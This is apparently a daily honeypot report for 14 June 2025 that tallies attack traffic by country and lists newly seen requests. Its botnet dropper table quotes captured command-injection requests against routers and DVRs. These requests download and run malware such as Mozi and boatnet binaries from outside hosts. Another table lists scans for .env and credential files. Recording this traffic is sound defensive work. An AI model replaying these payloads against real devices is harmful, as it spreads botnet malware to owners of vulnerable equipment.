Daily Report: 2025-06-14#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 6 stage 1 IP address(es), linked to 6 dropper URL(s).
There are 58 new requests that have never been observed before (these were added to the monitored request database.).
A total of 800 requests were recorded during the day, originating from 6 different countries, with a peak of 267 requests coming from US.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
| source_country | targeted_country |
|---|---|
| PL | Israel |
| CN | Georgia |
botnet_dropper_behaviour#
| remote_addr | request |
|---|---|
| 141.98.11.83 | GET /shell?cd+/tmp;iptables+-I+INPUT+-p+tcp+-s+141.98.11.147+–dport+5500+-j+ACCEPT;+iptables+-I+INPUT+-p+tcp+–dport+5500+-j+DROP;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/x86;chmod+777+;./x86+x86;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/arm7;chmod+777+;./arm7+arm7;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/arm4;chmod+777+;./arm4+arm4;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/arm5;chmod+777+;./arm5+arm5 HTTP/1.1 |
| 141.98.11.83 | GET /shell?cd+/tmp;wget+http://94.26.90.251/payload1.sh+-O-+ |
| 103.207.124.191 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.207.124.191:38029/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
| 144.172.103.59 | POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F15.235.149.59%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.1 |
| 45.135.194.34 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(killall -9 mipsel mpsl;(wget -O- http://154.91.254.95/rondo.sh |
| 45.135.194.34 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(killall+-9+mipsel+mpsl%3B%28wget+-O-+http%3A%2F%2F154.91.254.95%2Frondo.sh%7C%7Cbusybox+wget+-O-+http%3A%2F%2F154.91.254.95%2Frondo.sh%29+%7C+sh+-s+tplink%3B) HTTP/1.1 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
| number_of_occurence | request | |
|---|---|---|
| 42 | 2 | GET /.direnv HTTP/1.1 |
| 43 | 2 | GET /.env_s3 HTTP/1.1 |
| 44 | 2 | GET /static HTTP/1.1 |
| 45 | 2 | GET /.env0.2 HTTP/1.1 |
| 52 | 2 | GET /auth.env HTTP/1.1 |
| 53 | 2 | GET /.env.pem HTTP/1.1 |
| 57 | 2 | GET /.env.crt HTTP/1.1 |
| 59 | 2 | GET /.env.rc HTTP/1.1 |
| 60 | 2 | GET /.env0.1 HTTP/1.1 |
| 77 | 1 | GET /actuato%72 HTTP/1.1 |
| 78 | 1 | GET /actuato%2572 HTTP/1.1 |
| 81 | 1 | GET /venv.bak HTTP/1.1 |
| 83 | 1 | GET /prod.env HTTP/1.1 |
| 84 | 1 | GET /win/.env HTTP/1.1 |
| 85 | 1 | GET /prod-api;/actuator; HTTP/1.1 |
| 88 | 1 | GET /_ignition/health-check HTTP/1.1 |
| 90 | 1 | GET /api;/actuator; HTTP/1.1 |
| 94 | 1 | GET /env.bak/ HTTP/1.1 |
| 95 | 1 | GET /env.base HTTP/1.1 |
| 96 | 1 | GET /prod-api/actuator HTTP/1.1 |
| 133 | 1 | GET /163/.env HTTP/1.1 |
| 135 | 1 | GET /__ENV.js HTTP/1.1 |
| 136 | 1 | GET /Www/.env HTTP/1.1 |
| 143 | 1 | GET /140/.env HTTP/1.1 |
| 144 | 1 | GET /blog.env HTTP/1.1 |
| 146 | 1 | GET /zzz/.env HTTP/1.1 |
| 148 | 1 | GET /xyz/.env HTTP/1.1 |
| 149 | 1 | GET /zsh/.env HTTP/1.1 |
| 150 | 1 | GET /out/.env HTTP/1.1 |
| 152 | 1 | GET /l53/.env HTTP/1.1 |
| 158 | 1 | GET /.env-csr HTTP/1.1 |
| 159 | 1 | GET /.env.swo HTTP/1.1 |
| 160 | 1 | GET /.env.swn HTTP/1.1 |
| 161 | 1 | GET /.env-rce HTTP/1.1 |
| 162 | 1 | GET /.env.sql HTTP/1.1 |
| 163 | 1 | GET /.env_key HTTP/1.1 |
| 164 | 1 | GET /.env.sns HTTP/1.1 |
| 165 | 1 | GET /.env-ssl HTTP/1.1 |
| 166 | 1 | GET /.env-csp HTTP/1.1 |
| 167 | 1 | GET /.env.ses HTTP/1.1 |
| 168 | 1 | GET /.env.log HTTP/1.1 |
| 169 | 1 | GET /.env-gpg HTTP/1.1 |
| 185 | 1 | GET /.envfile HTTP/1.1 |
| 186 | 1 | GET /Tmp/.env HTTP/1.1 |
| 188 | 1 | GET /.env.k8s HTTP/1.1 |
| 190 | 1 | OPTIONS rtsp://xxx.xxx.xxx.xxx/ RTSP/1.0 |
| 206 | 1 | GET /.env_ftp HTTP/1.1 |
| 207 | 1 | GET /.env_gcp HTTP/1.1 |
| 208 | 1 | GET /.env_gcs HTTP/1.1 |
| 209 | 1 | GET /.env_git HTTP/1.1 |
| 213 | 1 | GET /Security/users?auth=YWRtaW46MTEK HTTP/1.1 |
| 215 | 1 | GET /RPC2_Login HTTP/1.1 |
| 216 | 1 | GET /cgi-bin/main-cgi?json=%7B%22cmd%22:255,%22szUserName%22:%22%22,%22u32UserLoginHandle%22:-1%7D HTTP/1.1 |
| 220 | 1 | GET /socket.io/1/?t=1749933664562 HTTP/1.1 |
| 231 | 1 | \x00\x0E\x08\xD3\x10f\xA7\xB0\xC5}S\x00\x00\x00\x00\x00 |
| 232 | 1 | \x00\x0E\x08\x04O\xD4\xEE\x00\xC4\x90*\x00\x00\x00\x00\x00 |
| 233 | 1 | \x00\x0E8\x04O\xD4\xEE\x00\xC4\x90*\x00\x00\x00\x00\x00 |
| 234 | 1 | \x00\x0E8\xD3\x10f\xA7\xB0\xC5}S\x00\x00\x00\x00\x00 |
country_iso_code#
| number_of_occurence | country_iso_code | |
|---|---|---|
| 0 | 267 | US |
| 1 | 81 | GB |
| 2 | 60 | NL |
| 3 | 45 | PL |
| 4 | 45 | BG |
| 5 | 39 | LT |
| 6 | 39 | DE |
| 7 | 37 | HK |
| 8 | 34 | SC |
| 9 | 28 | CN |
| 10 | 16 | IN |
| 11 | 12 | ZA |
| 12 | 11 | JP |
| 13 | 9 | CA |
| 14 | 8 | AO |
| 15 | 5 | GR |
| 16 | 5 | BE |
| 17 | 4 | TR |
| 18 | 4 | GH |
| 19 | 4 | ES |
| 20 | 4 | SG |
| 21 | 4 | NG |
| 22 | 4 | VN |
| 23 | 4 | AU |
| 24 | 3 | RU |
| 25 | 3 | KR |
| 26 | 3 | FR |
| 27 | 3 | BR |
| 28 | 3 | KZ |
| 29 | 2 | KW |
| 30 | 2 | IL |
| 31 | 2 | TM |
| 32 | 2 | AZ |
| 33 | 2 | IE |
| 34 | 1 | TW |
| 35 | 1 | RO |
| 36 | 1 | HU |
| 37 | 1 | PH |
| 38 | 1 | SE |
| 39 | 1 | IT |